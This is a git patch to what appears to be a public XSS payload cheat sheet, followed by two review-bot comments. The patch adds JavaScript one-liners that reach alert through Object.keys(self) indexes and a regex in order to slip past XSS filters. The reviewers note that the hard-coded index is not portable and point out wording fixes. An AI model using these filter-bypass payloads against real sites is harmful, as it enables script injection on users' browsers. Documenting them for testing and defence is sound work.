From 286f7caaa33bebbf1d2aca38721853552fb14246 Mon Sep 17 00:00:00 2001 From: clem9669 <18504086+clem9669@users.noreply.github.com> Date: Tue, 3 Dec 2019 15:24:24 +0100 Subject: [PATCH] Bypass XSS filters on alert Bypass XSS filters using javascript global variables based on the following article https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/ from theMiddle. --- XSS Injection/README.md | 34 +++++++++++++++++++++++++++++++++- 1 file changed, 33 insertions(+), 1 deletion(-) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 0e1edee..1fe1978 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -679,6 +679,38 @@ content['alert'](6) [12].forEach(alert); ``` +From [@theMiddle](https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/) - Using global variables + +The Object.keys() method returns an array of a given object's own property names, in the same order as we get with a normal loop. That's means that we can access any JavaScript function by using its **index number instead the function name**. + +```javascript +c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; } +// 5 +``` + +Then calling alert is : + +```javascript +Object.keys(self)[5] +// "alert" +self[Object.keys(self)[5]]("1") // alert("1") +``` + +We can find "alert" with a regular expression like ^a[rel]+t$ : + +```javascript +a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a() + +// then you can use a() with Object.keys + +self[Object.keys(self)[a()]]("1") // alert("1") +``` + +Oneliner: +```javascript +a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1") +``` + From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet. ```javascript 
@@ -1075,4 +1107,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) - [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) - [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) -- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf) \ No newline at end of file +- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)
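Review bot: The hard-coded index in the first hunk (`console.log(c); // 5` and `Object.keys(self)[5]`) is only valid in the environment where it was measured: the set and order of global properties on `self` differ between browsers, between pages, and with the scripts already loaded, so `5` will generally not resolve to `alert` elsewhere. The text should state that the number has to be recomputed in each runtime and present the regex variant `a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}}` as the portable form rather than as an afterthought. A second accuracy point in the same hunk: `for(i in self)` enumerates inherited enumerable properties as well as own ones, while `Object.keys()` returns only own enumerable properties, so the sentence "in the same order as we get with a normal loop" holds only when no inherited enumerable property is present; the index computed by the loop and the index into `Object.keys(self)` can otherwise diverge. Minor wording fixes for the added markdown: "That's means" -> "That means", "instead the function name" -> "instead of the function name", "Then calling alert is :" -> "Calling alert then becomes:", and "Oneliner:" -> "One-liner:" with a blank line before its code fence, matching the other fenced blocks in the file.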
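Review bot: The commit message does not mention the whitespace-only change in the second hunk, where the only difference between the removed and added `mXSS Attacks` reference line is the previously missing newline at end of file. Either note the trailing-newline fix in the message or keep it in a separate commit so the diff stays focused on the new XSS section.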